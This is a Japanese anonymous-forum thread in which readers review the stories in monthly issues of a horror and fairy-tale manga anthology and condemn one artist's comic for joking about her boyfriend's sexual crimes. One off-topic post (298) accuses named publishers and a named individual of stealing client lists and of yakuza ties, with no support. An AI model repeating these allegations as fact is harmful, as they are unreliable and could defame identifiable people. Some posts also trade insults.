根拠のない褒め言葉が投げられるのが本当にバカらしい

248 :花と名無しさん:2006/11/26(日) 22:53:38 ID:???0
灯篭ひっこぬいて・・・あれ痛くないんか

249 :花と名無しさん:2006/11/27(月) 01:29:41 ID:???O
如月の親分の自己暗示スゴスww

250 :花と名無しさん:2006/11/29(水) 06:49:46 ID:???0
>>234
自分の場合は、絵柄は華がどうしても竹崎キンペの
ムカつく瓶児に見える時があってヒロインを応援できない。。
11月号の吉原の話は、変な外人の登場で吹いたけどね。
ノリノリで「イェース」とか、「おカミさん、ユルして」とかw


>>241
>感動物を描かせたらピカイチだし。

ルチカファン多いみたいだね。私はダメだ。。
何ていうのか、絵柄、表情の描写が俳優でいうなら
大根役者みたいにわざとらしさがあって感動しない。
12月号のカラーは奇麗だったけど、見たことあると思ったら夢二だね。

251 :花と名無しさん:2006/11/29(水) 14:56:59 ID:???0
残グリゲトーーー!!!

252 :花と名無しさん:2006/11/29(水) 19:58:49 ID:jauX6VGg0
今月の残グリ、呪さんがのってなーーーーいっ!!
お見送りいたしますは場違いだけど続きが気になる・・・・。

253 :花と名無しさん:2006/11/30(木) 11:35:56 ID:???0
花ワロタ
もうギャグマンガでしょw

254 :花と名無しさん:2006/11/30(木) 11:50:55 ID:???O
白井のファウスト、なんか別の題材(猿の手)みたいで少し萎えた。
ちょっと前に甘栗で読んだ、千之ファウストの方が雰囲気たっぷりで
良かったな。

255 :花と名無しさん:2006/11/30(木) 12:59:46 ID:???0
白井は話がつまんない。
絵は綺麗だけど、今回、なんとなく荒れてるし。
悪魔の出てくるページだけはうっとりしたけど。

256 :花と名無しさん:2006/11/30(木) 13:19:18 ID:???0
白井が載る度に速攻でいつもレスしてる人がいるけど、同じ人なのかな?
アンチなのかファンなのか。
今回の話は未消化っぽかったねぇ。
なんか色々とっ散らかってて、猿の手は確かに似てると思った。
編集部で押してるっぽいけど、どうなのか。
ただ、スレで毎回話題に上るって事は、アンチにせよなんにせよ、目立つんだろうな。

松苗とか、あれどうなのよ。鳴り物入りの割にはすごいスルーされっぷりw


257 :花と名無しさん:2006/11/30(木) 15:20:39 ID:???0
松苗は…なんというか…スルー作家の仲間入りだわ

258 :花と名無しさん:2006/11/30(木) 15:56:29 ID:???O
天ぷ〜ら

【残グリ 2007年1月号】
●表紙(魔木子):
●変化のお梛事件帖〜花軍(魔木子):
●聖堂の悪魔(白井幸子):
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ):
●金瓶梅(竹崎真実):
●はつ恋 前編(かずはしとも):
●ダリとガラ(佐々木彩乃):
●シンデレラなボーイ(松苗あけみ):
●ヴェニスの商人(小野双葉):
●赤い花火(森左智):
●本当にあった笑える話(桜木さゆみ):
●猫のお嫁さん(空路):

259 :花と名無しさん:2006/11/30(木) 17:46:51 ID:???0
天ぷら乙〜

●表紙(魔木子): 今回いつもより地味かな?
●変化のお梛事件帖〜花軍(魔木子): お梛&姫姉妹が同じ顔
●聖堂の悪魔(白井幸子): 悪魔が美しい。話はたしかに猿の手に似てる。
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ): ハッピーエンドで不覚にも感動した。
●金瓶梅(竹崎真実):馮ばぁ怖ええぇえ!!金蓮&王婆 VS 瓶児&馮婆wktk 
●はつ恋 前編(かずはしとも): 淡々とした感じ。後編読むまではなんとも・・
●ダリとガラ(佐々木彩乃):絵が汚い。 この人の話は嫌いじゃないけど
●シンデレラなボーイ(松苗あけみ): ナルシス王子の存在意義がわからない。
可も無く不可も無く。
●ヴェニスの商人(小野双葉): 読後感が悪かった。消化不良な感じ。
●赤い花火(森左智): おもろかた。タイトルもあっててイイ
●本当にあった笑える話(桜木さゆみ): ・・・
●猫のお嫁さん(空路): 普通によかた。 関係ないがこの人の絵が
たまに御茶漬海苔の絵に見える事がある。


260 :花と名無しさん:2006/11/30(木) 19:32:58 ID:???0
天ぷらお借りします

●表紙(魔木子):普通
●変化のお梛事件帖〜花軍(魔木子):華やか〜でも女の人の顔もっと描きわけて欲しい。区別が・・・
●聖堂の悪魔(白井幸子):無難に終わったというかよくあるパターン。絵が綺麗な分期待しすぎたかも。
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ):かわいそうだったけど最後遣り遂げたおばあちゃん良かった。
●金瓶梅(竹崎真実):面白かった!これからの展開に期待。
●はつ恋 前編(かずはしとも):うーん。これからかな?
●ダリとガラ(佐々木彩乃):個人的にダリが好きなせいかあまり好きじゃなかった。
●シンデレラなボーイ(松苗あけみ): 独特なノリだなぁ。
●ヴェニスの商人(小野双葉): これを短編にするには無理があったかと・・・
●赤い花火(森左智): 綺麗に纏まってた。
●本当にあった笑える話(桜木さゆみ): かわりに呪載せて
●猫のお嫁さん(空路): 昔話と同じでほのぼの。


つまらないってわけじゃないけどイマイチ。
金瓶梅なかったら買ってなかったかも。

261 :花と名無しさん:2006/11/30(木) 20:09:17 ID:???0
白井に辛口コメントが毎回つくのは期待度が大きいってことなんだろうな。
あの絵で、話しも面白かったらもっと嬉しいはず!という。

小野、やっと載ったのですごく喜んだけど、期待が大きすぎて(´・ω・`)


262 :花と名無しさん:2006/11/30(木) 21:09:51 ID:???0
白井。最初の2回(沖縄のとヨウの)が文句なしだったから
その後がパンチなくて、がっかり度アップ。

263 :花と名無しさん:2006/11/30(木) 21:16:58 ID:???0
白井のイチオシはゲッベルスの妻、これにつきるな。
円山の次回予告、タイトルなかったけどまたお見送りか?
ここで散々叩かれてるのになんで載るんだろうか。

264 :花と名無しさん:2006/11/30(木) 21:36:27 ID:???0
小野さん、久しぶりの登場だったけどなんかキレがなかった。
よくわからない話になってたなぁ。
絵もちょっと荒れてるというか手抜きというか。

白井さんのは沖縄の話が好き。今回の悪魔のやつってシリーズになるのかな?
う〜ん…連載より読みきりでいろんなものを描いて欲しいんだけど〜。

松苗さんの絵は好きだけど、毎回ストーリーがないというか・・・内容って何?ってかんじ。




265 :花と名無しさん:2006/11/30(木) 22:17:00 ID:???0
小野さん、めずらしく絵が荒れていたよね、
長いこと載ってなかったし、体の調子でも悪いんだろうか。

266 :花と名無しさん:2006/12/01(金) 16:35:51 ID:+Xtr4B7d0
テンプレンタル!!
●表紙(魔木子):とくにこれといって
●変化のお梛事件帖〜花軍(魔木子):○ 全体としては綺麗だけど人の
顔が同じに見えるのは同意。
●聖堂の悪魔(白井幸子):△ 普通にいいけどシリーズ化はちょっと・・・
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ):◎ 最後に泣けたーーーーーっ!!
やっぱルチカさんがいないとね。
●金瓶梅(竹崎真実):○ ますます人物関係がややこしく・・でも楽しみ。
●はつ恋 前編(かずはしとも):? 後編読まないとなんとも言えない
●ダリとガラ(佐々木彩乃):△ イマイチ。前の雨乞い巫女の話がよかった。
最後ひまわりが出てきて・・・タイトルなんだっけ?
●シンデレラなボーイ(松苗あけみ):未読
●ヴェニスの商人(小野双葉):未読
●赤い花火(森左智):△ 作者自身が好きじゃない。でも今回はまぁまぁ。
●本当にあった笑える話(桜木さゆみ):未読 さっさと消えて欲しい
●猫のお嫁さん(空路):○ いつもは読んでないけど今回は良し。

今月号はルチカさんが一番面白かった。でも呪さんがでてないのは残念・・・。


267 :花と名無しさん:2006/12/02(土) 14:34:40 ID:???0
私もレンタル!

●表紙(魔木子): 綺麗だけど、それだけ。
●変化のお梛事件帖〜花軍(魔木子): 何だかどうでもいい話だった。華やかだけど。
●聖堂の悪魔(白井幸子): インパクトがない、雰囲気マンガに成り下がった。
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ): お勝ばあさんは本当の優しさを持っている人だね。
●金瓶梅(竹崎真実): いいねいいね、この相関関係の複雑さと思惑の入り混じり、
●はつ恋 前編(かずはしとも): まあまあかな、でも後半期待。
●ダリとガラ(佐々木彩乃): ダリは良く知らないけど、こんな人だったのかな。
●シンデレラなボーイ(松苗あけみ): 空気。
●ヴェニスの商人(小野双葉): 期待していたのに、あんまり面白いと思わなかった。
●赤い花火(森左智): この人の作品の中では一番良かった。
●本当にあった笑える話(桜木さゆみ): いなくなって欲しい。
●猫のお嫁さん(空路): ほのぼの展開とハッピーエンドにほっこり和んだ。

ルチカさんは毎月描いているだけに、出来にはたまにバラつきがあるけど、
今回はすごく良かった。優しい家族が幸せになるオチについ泣きそうになった。
でも、他にもっと実力派が欲しいところ。

268 :花と名無しさん:2006/12/02(土) 15:08:45 ID:+Y95m6yAO
桜木さゆみつまんねー。絵も下手だし、結局自虐漫画じゃん。

269 :花と名無しさん:2006/12/02(土) 16:14:17 ID:???0
本当にあった笑える話とお見送りを消去してくれればいいのになあ。

お見送り〜に関しては掲載誌が違ってればそんなに嫌いじゃないけど。

270 :花と名無しさん:2006/12/02(土) 16:24:39 ID:???0
桜木さゆみの彼氏の話を読んだら、本当に気持ち悪くなった。
酔っ払った女性をホテルに連れ込んで、生でやって金を持って逃げたというやつ。
創作だとしても、あまりにも胸糞悪い。
そしてそんな男の話を嬉々として描く桜木にも、嫌悪感しかわかない。

271 :花と名無しさん:2006/12/02(土) 16:56:41 ID:???0
私もさゆみの彼氏関係の話は無理。
性格最悪杉。
数々の女関係の悪事を彼女に話すのもそれを嬉々として漫画に描く彼女も、どっちも神経を疑う。
ていうか本当に恋人同士なのか?何故こんな奴と付き合ってるんださゆみ。
自虐系の漫画は好きだけど、この人のは何かが違う気がする。

272 :花と名無しさん:2006/12/02(土) 17:06:49 ID:???0
>>266
雨乞い巫女の話…原作が「石長比売と木花之佐久夜毘売」のだっけ?

273 :花と名無しさん:2006/12/02(土) 17:15:30 ID:???0
>>270-271
ハゲドウ!!!
彼氏もキモイが、それを描く桜木が更にキモイ。

274 :花と名無しさん:2006/12/02(土) 17:30:47 ID:???0
自虐系マンガ家だから、ネタになるものなら何でも描くスタンス
なんだろうけど、ネタの質が悪すぎてギャグ風味でも笑えない。
てか、普通に犯罪だろう。
酔っ払った女の子ホテルに連れ込んで、中田氏して金取るなんて。
ホテル代だけ残したとかほざいてたけど、同じだ。

275 :花と名無しさん:2006/12/02(土) 17:36:10 ID:???0
金づるだった女がもう金無くなったのを知って風俗に売り飛ばした話もあったよね。
そんな話を普通彼女にするだろうか。

さゆみもギャグで済むか済まないかの判断くらいは持てと。


276 :花と名無しさん:2006/12/02(土) 17:55:36 ID:???0
同じネタでも、キャラの違う人が描いたらまた別の味わいがあるのかも。
ただ、桜木は漫画そのものがくそつまんね。ネタ以前の問題じゃないかと思う。

277 :花と名無しさん:2006/12/02(土) 19:19:29 ID:???0
お借りします
●表紙(魔木子): なんかぱっとしない
●変化のお梛事件帖〜花軍(魔木子): お話は華やかなんだけど、いざって時の見せ場が埋もれてる感じ。全部書き込みすぎ?
●聖堂の悪魔(白井幸子): いまいち。絵の分、点が辛めにはなるけど期待はしてる。
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ): 完成度は今月一番かな。いいんじゃないの
●金瓶梅(竹崎真実): よくみると線がいつもより丁寧なんだけど、あんまり印象かわんないなー。フウおばさん、顔変わってない?
●はつ恋 前編(かずはしとも): 絵も話も硬いなぁ。恋愛ものなのに。
●ダリとガラ(佐々木彩乃): わけわからんwこの人の作風といってしまえばそうなんだが
●シンデレラなボーイ(松苗あけみ): もう二度と登場しなくていいです
●ヴェニスの商人(小野双葉): 期待したんだけど、不満が残る出来。好きなんで頑張って欲しい。
●赤い花火(森左智):女の性格が身勝手すぎる気がする。
●本当にあった笑える話(桜木さゆみ): スルー検定
●猫のお嫁さん(空路): あっても無くてもいいやって印象

ラインナップは豪華だった気がするんだが、内容がいまいちなのが多すぎ。
その点、ルチカがいつもの安定度なのが評価が相対的に高くなった印象。
来月は頼みますよ。

278 :花と名無しさん:2006/12/02(土) 21:09:48 ID:???0
お見送り〜
は男の顔がキモイ
馬面、口の位置が変

私も、さゆみの彼氏、家族の下ネタの話は嫌い
まだ今のほうがいい


279 :花と名無しさん:2006/12/02(土) 21:15:29 ID:???0
天ヶ江ってこんなに人気があるのに専スレないのな


280 :花と名無しさん:2006/12/02(土) 21:38:03 ID:???0
もうこれ以上専スレたてないでね。
グリム関連起ち杉。

281 :花と名無しさん:2006/12/02(土) 21:39:16 ID:???0
そんなにあったっけ

282 :花と名無しさん:2006/12/02(土) 21:41:48 ID:???O
白井って絵は褒められてるけど、今回に限ってはそう思えない。
バストアップばかりだし、背景白いし。
一コマの中に人物を複数配置できてない上、俯瞰になるとデッサンが狂ってる。
なんか隅をつつけばボロが多い

283 :花と名無しさん:2006/12/02(土) 22:10:24 ID:???O
なんか同業くさいレスだな〜。てかこのスレ絶対作家かきこんでそうw

284 :花と名無しさん:2006/12/02(土) 22:11:36 ID:???0
だよね。自分も少し前から気になっていた。。。

285 :花と名無しさん:2006/12/02(土) 22:14:06 ID:???0
同業っていうよりアシっぽい

286 :花と名無しさん:2006/12/02(土) 22:22:15 ID:???0
>>283
少なくとも一川は娘からクオリティネタを聞かされてるはずだ。


287 :花と名無しさん:2006/12/02(土) 22:25:27 ID:???0
最近、一川どこで描いているっけ?
グリムでは見かけないけど?

288 :花と名無しさん:2006/12/02(土) 22:27:08 ID:???0
>>283
作家本人はどうかと思うけど、マンセー部員がいることは確かw

289 :花と名無しさん:2006/12/02(土) 22:41:59 ID:???0
つヒント:タウンミーティング

290 :花と名無しさん:2006/12/02(土) 22:49:56 ID:???0
そういえば、逢坂が他グリムで再録ってあったけど、
残グリにはもう載らないんだろうか。
はじめのに比べてだんだん面白くなってきてたんだが。

291 :花と名無しさん:2006/12/02(土) 23:06:44 ID:+Y95m6yAO
桜木さゆみは絵が下手だよね。それに彼氏とか言うけど彼氏じゃないでしょう。ただの金づる財布扱いじゃん。4コマ雑誌買うと良く載ってるのがイラつく

292 :花と名無しさん:2006/12/03(日) 01:19:44 ID:???0
松苗とお見送りは、他の本に載っていたら楽しめるような気がする。
単独では面白いと思うんだけど、一冊読んでいくとなんかスルーしたくなる。
残グリ読みたいときのテンションに合わないんだよね。

293 :花と名無しさん:2006/12/03(日) 02:22:09 ID:???0
お見送りは現代色があるから、残グリにはなじまない気がする
12月号のグリムで遺体を洗いながら先輩に思いを馳せるシーンは
残グリ童話の世界なら、まァ、アリだろうけど、なんでかなー少し引いた。

294 :花と名無しさん:2006/12/03(日) 15:25:07 ID:???O
お見送り くもいのさんだんだん性格の悪い嫌な女に見えてきた

295 :花と名無しさん:2006/12/03(日) 22:48:41 ID:???0
>>287
ほん怖に島流しになりました。
それにしても最近残グリ画家ネタばっかのせてくるね。
ダビンチコードにのかってるの?
そうなら来年の今頃はのだめ効果で音楽家ネタだろうな。

296 :花と名無しさん:2006/12/03(日) 22:50:28 ID:???0
ベートーベンもあるしな

297 :花と名無しさん:2006/12/03(日) 23:34:25 ID:???0
生誕ウン年というのにモーツァルトはやったっけ?

298 :花と名無しさん:2006/12/06(水) 04:02:54 ID:wgSci7AV0
ぱちんこ裏帝国(ぶんか社)の編集はメディアアート出版、この事務所内で攻略会社の電話受けもやっています。
編集部みずから攻略会社やっているって(笑)流石メディア21グループ(後藤組けつもち)

またこの雑誌専門の広告代理店のビジョナリーカンパニーの大塚は以前、芸栄社の社員で芸栄社から名簿パクッテ独立、
今ではメディアアート出版の林の舎弟となっている。それを知らない芸栄社は毎月、数百万も裏帝国に広告を入れ続けている。
芸栄社も舐められてもんやのう。

299 :花と名無しさん:2006/12/08(金) 15:53:56 ID:???0
明日残グリDX発売!


300 :花と名無しさん:2006/12/09(土) 00:23:03 ID:???0
300(σ´∀`)σゲッツ!!

301 :花と名無しさん:2006/12/10(日) 21:10:22 ID:AL01rlh40
DX立ち読みした。
さゆみのDQN彼氏話の再録が載ってて不快になった。
あの話聞いても退きも冷めもしないでネタにする神経がわからん。
レイプ常習犯の男友達の話も前載せてたし、こいつの交友関係はどうなってんだ…。

302 :花と名無しさん:2006/12/10(日) 21:19:11 ID:???0
>>301
あのナンパして犯して山に捨てたというやつか・・・。
あれ読んだとき、寒気したよ。
あの人の友人って犯罪者しかいないの?

303 :花と名無しさん:2006/12/10(日) 21:31:07 ID:???0
>>302
ゴメン。そっち知らないや。
私が見たのは、道歩いてる女の子に車から毛布かぶせて拉致して山で犯して捨ててくるってやつ。
女友達に「しょっちゅうやってる」とのうのうと話す男ってどうよ。

さゆみ彼氏の話を一緒に聞いてた友人(女)の反応はどうだったんだろう。

304 :花と名無しさん:2006/12/10(日) 21:36:16 ID:???0
私は彼氏がよっぱらいの女の子ホテルに連れ込んで中田氏して、金抜き取ってホテルに置き去りっていうのが
ネタとしてのウソ話であってもひくよ

305 :花と名無しさん:2006/12/10(日) 21:38:10 ID:???0
>>304
その話が今回のDXに載ってた

306 :花と名無しさん:2006/12/11(月) 17:13:13 ID:???0
桜木がのってなきゃDXはそこそこおもしろかったのに・・・最悪。

307 :花と名無しさん:2006/12/11(月) 17:40:07 ID:???0
残グリDXげと。

表紙裏の、出会い系サイトの広告の絵が、竹崎さん(金瓶梅)の
パクリっぽいと感じたのは自分だけ?  

308 :花と名無しさん:2006/12/11(月) 18:44:31 ID:???0
DXの感想を簡単にお願い出来ませんか?(桜木以外)

309 :花と名無しさん:2006/12/12(火) 17:23:41 ID:???0
>>307
それ思った。
意識して描いたんかな?


310 :花と名無しさん:2006/12/13(水) 00:58:30 ID:???O
>>307
寂しくなったら気軽にかけてよ。
次ページが、おまえが一番好きだよ 金蓮でわろた。

呪漫画にはやはりよし子さんがいるし。

311 :花と名無しさん:2006/12/18(月) 05:27:28 ID:???0
今さらだが天麩羅お借りします。
●変化のお梛事件帖〜花軍(魔木子):誰かも言ってたけど、書き込みすぎ。ちまちましてて好きじゃない。
●聖堂の悪魔(白井幸子):最後は意外だった。まあまあ良かったけど、ぱっとしない。
●銭屋お勝 大晦日奇譚(天ヶ江ルチカ):良かった!可愛くて純粋なだけの主人公が多い中、新鮮な主人公でもある。
●金瓶梅(竹崎真実): フウおばさんには賢くて良い人のままでいて欲しかったが。これからの展開がどうなるのか注目。
●はつ恋 前編(かずはしとも): なかなか良かった。後半が楽しみ。
●ダリとガラ(佐々木彩乃):この人の漫画は時々意味のわからない所がある。今回はいまいち。
●シンデレラなボーイ(松苗あけみ): ここでは人気ないみたいだが、なかなか良かった。不幸な美女が王子に
見初められる典型パターンだと思っていたが、見事に裏切られた。
●ヴェニスの商人(小野双葉): 上と同じくここでは不評だが、個人的に今月のNO.1。同性愛ものが好きなせいか?
●赤い花火(森左智):まあまあ良かった。が、この主人公のような女かなり苦手。
●本当にあった笑える話(桜木さゆみ): 前号まではそれなりに面白い話もあったが、今回最悪。全然楽しくない。
●猫のお嫁さん(空路):まあまあ。この人には是非残酷系の話を描いて欲しい。

312 :花と名無しさん:2006/12/18(月) 22:36:57 ID:???0
>>311腐女子キモイwwwwwwwwwwwwwwww
死んでwww

313 :花と名無しさん:2006/12/19(火) 14:58:55 ID:???0
>>312
お前が市ねば無問題ジャマイカw

314 :花と名無しさん:2006/12/19(火) 18:21:30 ID:???O
今月の桜木4コマの最後のやつ(競馬)
2ちゃんネタなんですけど…

315 :花と名無しさん:2006/12/19(火) 18:39:07 ID:???0
ディアデラ好きな自分は、初めて桜木に殺意が湧きました


いや、マジで

316 :花と名無しさん:2006/12/19(火) 19:35:33 ID:???0
いやぁ…>>311はきもいな。
あと必死な>>313も。

317 :花と名無しさん:2006/12/19(火) 20:03:16 ID:???0
>>316
どうしたの?
おねしょしてママに怒られた?

318 :花と名無しさん:2006/12/19(火) 21:17:29 ID:???0
312はここで叩かれてる作者か?

319 :花と名無しさん:2006/12/19(火) 22:51:35 ID:???0
叩かれてる…誰だろう。
桜木?

320 :花と名無しさん:2006/12/20(水) 09:01:57 ID:???0
何このスレ、くさいのやくさいのを相手するカスばっかり

321 :花と名無しさん:2006/12/20(水) 15:08:08 ID:iI/OpCF5O
桜木はやっとあの犯罪者と別れたらしい

322 :花と名無しさん:2006/12/20(水) 15:34:07 ID:???0
>>321
kwsk

323 :花と名無しさん:2006/12/26(火) 06:28:00 ID:Nxe6gEmEO
今月も華はうざかった

324 :花と名無しさん:2006/12/26(火) 20:05:07 ID:???O
てかどれもつまらなかったよ、ほん怖
藤田あ位かな〜、でも絵がアレだし。

325 :花と名無しさん:2006/12/27(水) 12:08:06 ID:???0
予告は衝撃的だったけどな。

326 :花と名無しさん:2006/12/27(水) 16:25:53 ID:???0
今月の残グリは明日発売ですよ、お姐さん方!!
キンペの続きが待ち遠しい!

327 :花と名無しさん:2006/12/28(木) 01:31:05 ID:???0
ほん怖、鯛夢が載る号は買う。

328 :花と名無しさん:2006/12/28(木) 17:25:44 ID:???0
最新号、今から買ってくる!!


329 :花と名無しさん:2006/12/28(木) 22:18:58 ID:???0
はじめて遠野のを面白いと思った。

330 :花と名無しさん:2006/12/29(金) 20:44:19 ID:???0
>329
同感!読み入ってしまった・・。

331 :花と名無しさん:2006/12/29(金) 20:48:13 ID:???0
今月号、さっき買って読んでみたけどなかなか面白かった。
いつもスルーしてた遠野さんやら魔木子さんの漫画を全て読み通せたし。
他にキンペとかも良かったけどやっぱ呪さんの都市伝説がベスト!かな?


332 :花と名無しさん:2006/12/30(土) 14:43:24 ID:???O
キンペ、折角フウが味方についても
瓶児のアホさ〉フウの智略になりそうで楽しみ。

333 :花と名無しさん:2006/12/30(土) 16:42:31 ID:???0
呪のは山岸涼子の汐の声だね。
最後が舞あけみだった。

334 :花と名無しさん:2006/12/31(日) 06:36:33 ID:???O
そうなんだ。私はエマニエル坊やを思い出したよ。

335 :花と名無しさん:2006/12/31(日) 08:31:34 ID:BPxCwKqu0
後書きでガッチャマンの思い出を書いてた魔木子さんに、正直
「やっちまった」感が。そういえば、元々そこから来た人だもん
なあ。

336 :花と名無しさん:2006/12/31(日) 09:32:17 ID:???O
今じゃ同人出身じゃない漫画家なんて皆無じゃないか?

337 :花と名無しさん:2006/12/31(日) 11:55:03 ID:???0
>>333
私も松井を思い出したよ
パクリとは言わんが、パクリと言われても仕方がないかもしれない

338 :花と名無しさん:2006/12/31(日) 12:06:16 ID:???0
>>333
普通に有名な都市伝説(ジュディ・ガーランドとか)を元にしただけだろ>山岸も呪も

汐の声は読んでたが、作者のアプローチの違いを楽しめたよ。
エマニエル坊やネタもうまい具合にMIXされてたし。

339 :花と名無しさん:2006/12/31(日) 12:08:16 ID:???0
スマソアンカー間違い
>>338>>337

340 :花と名無しさん:2006/12/31(日) 16:56:51 ID:???0
アーノルド坊やじゃね?>呪

341 :花と名無しさん:2007/01/03(水) 14:57:46 ID:???0
一般読者は知らんと思うがフランスはサリカ法で女子には王位継承権はないんじゃあるまいか?白井よ…

342 :花と名無しさん:2007/01/03(水) 16:29:42 ID:???0
呪の漫画、「実年齢はもっと上」って言われてたけれど楽屋で煙草吸ってるなw
数歳かと思ってたけれども20代かそれ以上か?あの子役・・・。

343 :花と名無しさん:2007/01/03(水) 21:40:40 ID:???O
羽根男がそろそろ厨臭いのだが>白井
天使で悪魔って…

344 :花と名無しさん:2007/01/04(木) 00:55:58 ID:???0
てか、話そのものが面白くないよ>白井
これっぽっちも思い入れ出来ないジャンヌ・ダルクは初めてだ。
とにかく性格悪過ぎ。

345 :花と名無しさん:2007/01/04(木) 01:17:31 ID:???O
悪魔さまの引き立て役でしかなかったしな…

346 :花と名無しさん:2007/01/04(木) 05:54:06 ID:???0
>>344
同意…
あとサリカ法は自分も気になった。
白井が気がつかなくても、担当は気がつくべき。


347 :花と名無しさん:2007/01/04(木) 14:29:17 ID:???O
本気でフランスを救いたいと思って戦い始めたのなら感情移入も出来るけど
最初から最後まで自己顕示欲だけの妄想厨だしな。

348 :花と名無しさん:2007/01/04(木) 14:41:39 ID:???0
白井もあれだが…かずはしにがっかり…
この人、文芸大作シリーズ向いてない。

349 :花と名無しさん:2007/01/05(金) 12:58:33 ID:???O
かずはしはベタな人情・感動モノが一番合う気はするが
文芸モノが似合わないわけじゃないと思うな。
クリスマスキャロルは面白かったし。

恋愛(愛憎)モノが似合わないんじゃないか?


350 :花と名無しさん:2007/01/05(金) 16:37:25 ID:???0
呪の女の子の元キャラは安達ゆみだねー。
おもわずわろた。

351 :花と名無しさん:2007/01/05(金) 17:15:32 ID:???0
>白井
ジャンヌ・ダルクを聖女じゃなく、イタイ女という視点で描きたかったんだろうけど、
徹頭徹尾嫌な性格のままだったので、
せっかく男と結ばれ、その男に告発されるという、
上手く使えば盛り上げられるスパイスを活かせなかった、って感じ。
前に描いてた沖縄モノ(?)の羽衣伝説の話は、
ワガママで嫌な性格だった女が、真実の愛に目覚めていく過程がよく描けていた。
あのクオリティを期待したいんだけど、結構出来にムラがあるよね、この人。

352 :花と名無しさん:2007/01/05(金) 17:34:54 ID:???0
白井ってかなり前から残グリ載ってるけど注目され初めだしたのって
このスレで言うと羽衣伝説の頃からだよね。それまで話題にもならなかったし。
今回のは痛い女とか馬鹿女がテーマだとしっくりきたんじゃないかと思った。
ただどうも「悪魔の花嫁」思い出してしょーがないw

呪のは絵が迫力あるから汐の声と同じくしばらく忘れられそうにない…

353 :花と名無しさん:2007/01/05(金) 23:21:53 ID:???0
ミラ・ジョボのジャンヌダルクは痛い女だったよな。

354 :花と名無しさん:2007/01/05(金) 23:46:51 ID:???O
ジャンヌ痛女説って結構ありがち。
しかしありがちな題材をいかに面白く料理できるかが
作者の腕の見せどころだけど、白井版はそれどころじゃない

355 :花と名無しさん:2007/01/06(土) 00:34:45 ID:???0
おめーら文句ばっか言ってんじゃねぇぞこのタコ!

356 :花と名無しさん:2007/01/06(土) 01:55:05 ID:???0
>>355
またおまえか

357 :花と名無しさん:2007/01/08(月) 10:12:40 ID:???O
ん〜? 白井ってそんなに前から残グリにいたっけ? ナチ物から位しか
記憶にないけど…むしろホラーMの方が記憶に深い。

358 :花と名無しさん:2007/01/08(月) 10:37:29 ID:???0
ナチスの女性幹部が主人公の話から登場したんじゃないかな。
当時は何て綺麗な絵だろうと思ってたから印象に残ってる。
その後、残念だけどだんだんボロが出てきたという感じだが。

359 :花と名無しさん:2007/01/08(月) 17:55:15 ID:???0
キツネの嫁入り話もやってたけどナチの前かな?

知名度高い人物伝はいろんな人が描いてる&伝記読んでたりするから
うまくアレンジしなきゃツマンネで終わるのが多い気がする

360 :花と名無しさん:2007/01/09(火) 18:15:36 ID:???O
今月号、安定している竹崎&呪除くと、お見送りが一番面白かった。
これはこれで何か別の意味でマズイような気がする。
つか&藤田あはこれでよし(好きな作家なのでおおあま)

361 :花と名無しさん:2007/01/09(火) 20:56:18 ID:???0
お見送りはふつうに面白い漫画だよね。
でも残グリで見るのは微妙。

362 :花と名無しさん:2007/01/09(火) 22:00:29 ID:CFpanRhK0
今回、キンペって顔のデッサンが少しおかしくなかった?

363 :花と名無しさん:2007/01/09(火) 22:08:05 ID:???0
デッサンは毎回おかしいよ?

364 :花と名無しさん:2007/01/09(火) 23:51:41 ID:???O
白井のジャンヌ、王家の血を引く姫君殺害とか、その従者と
ベッドインとか、そういう余計なシーン全て省いて
とにかく大妄想全開で、突き抜けた基地女だったら
結構面白かったかも。

365 :花と名無しさん:2007/01/10(水) 10:00:40 ID:???0
設定の整合性を合わせて、エロも足してみました、ってとこまでで終わったもんな。
白井の漫画ってキャラの気持ちがわかんない。
ある意味、鼻と似てるかも。

366 :花と名無しさん:2007/01/10(水) 10:13:50 ID:???0
たしかにそうなんだけれどさ・・・本人さんのブログとか見るとね
一生懸命書いた事は伝わってくるからとても贅沢いえないや。

367 :花と名無しさん:2007/01/10(水) 10:27:21 ID:v4XfqZYn0
友達じゃないんだし。
心を込めていてもまずい料理を出す店に行く人いないよ。
お金払った客としては、まずいもんはまずいと言うか、
次から買わないかしかないじゃん。

368 :花と名無しさん:2007/01/10(水) 23:39:29 ID:???O
へたに作家さん達のブログやHPをのぞかない方がいいような気が。
情がわきそうで精神的にきつい。ファンなら別だけど。

369 :花と名無しさん:2007/01/11(木) 00:34:05 ID:???0
幼稚園児や素人じゃないんだから
「こんなにがんばったんだから褒めてあげようよ!」
なんていわれても(°Д°)ハァ?でしかないよねw

370 :花と名無しさん:2007/01/11(木) 01:11:06 ID:???O
正直、がんばってアレかよwって感想しか湧かない

371 :花と名無しさん:2007/01/11(木) 11:17:53 ID:???O
天使男がいらない。
あれさえなきゃ自分は結構楽しめた。

白井はナチスと狐と羽衣がよかったなぁ。

372 :花と名無しさん:2007/01/12(金) 08:05:11 ID:???0
正直白井には期待も何もしてないし、面白いとおもったことはないや。
単に好みじゃないだけだろうけど
絵も話もペラッペラに感じてつまんない。
童話のほうにいけばいいのに。

373 :花と名無しさん:2007/01/12(金) 08:57:43 ID:???O
現実味のない男キャラとか、いかにも少女マンガって感じだからそっち方面にいけばいいのに
とにかく目の届かない所に行ってほしい。今回で不快感でてきた。


374 :花と名無しさん:2007/01/12(金) 12:56:49 ID:???O
かと言ってグダグダアンチ意見書かれるのもうざい。

375 :花と名無しさん:2007/01/12(金) 13:15:54 ID:???0
だったらスルーするか別の意見振れば。


376 :花と名無しさん:2007/01/13(土) 14:41:59 ID:???O
かずはしがまた連載やるみたいだね。
最近やたらとシリーズ多いけど、読み切りのネタ切れ?
シリーズものはキンペあれば十分なんだけどなぁ。

けど、オズの魔法使いなら恋愛モノと違ってかずはしに結構合う気がするので期待しておく。

377 :花と名無しさん:2007/01/13(土) 16:40:41 ID:???0
オズなのか。ちょっと楽しみだ。
確かにかずはしに似合いそう。

378 :花と名無しさん:2007/01/13(土) 21:28:48 ID:???0
お前らクズ腐の為にわざわざ作家が書いてんだから文句言うんじゃねぇよw

379 :花と名無しさん:2007/01/13(土) 21:31:15 ID:???0
>>378
腐の意味も知らない素人、乙。

380 :花と名無しさん:2007/01/13(土) 21:33:04 ID:???0
ゴミ漫画にゴミ読者ありき・・・

381 :花と名無しさん:2007/01/13(土) 22:00:43 ID:???0
>>380
